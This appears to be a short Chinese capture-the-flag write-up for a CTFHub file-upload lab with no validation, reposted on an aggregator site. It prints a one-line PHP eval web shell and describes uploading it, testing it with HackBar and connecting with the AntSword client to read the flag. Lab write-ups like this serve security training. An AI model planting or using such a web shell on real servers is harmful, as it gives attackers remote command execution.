当前位置: 代码迷 >> 综合 >> CTFHub-无验证上传-wp
  详细解决方案

CTFHub-无验证上传-wp

热度:99   发布时间:2023-11-15 10:03:31.0

无验证文件上传

  • 使用一句话木马

    <?php @eval($_POST['a']); ?>
    

    并保存为.php文件

  • 上传成功并回显相对路径

在这里插入图片描述

  • 复制路径并访问,使用HackBar进行POST传参验证木马可行性

在这里插入图片描述

  • 执行成功

在这里插入图片描述

  • 使用蚁剑工具对木马进行连接

在这里插入图片描述

  • 连接成功

在这里插入图片描述

  • 拿下flag

在这里插入图片描述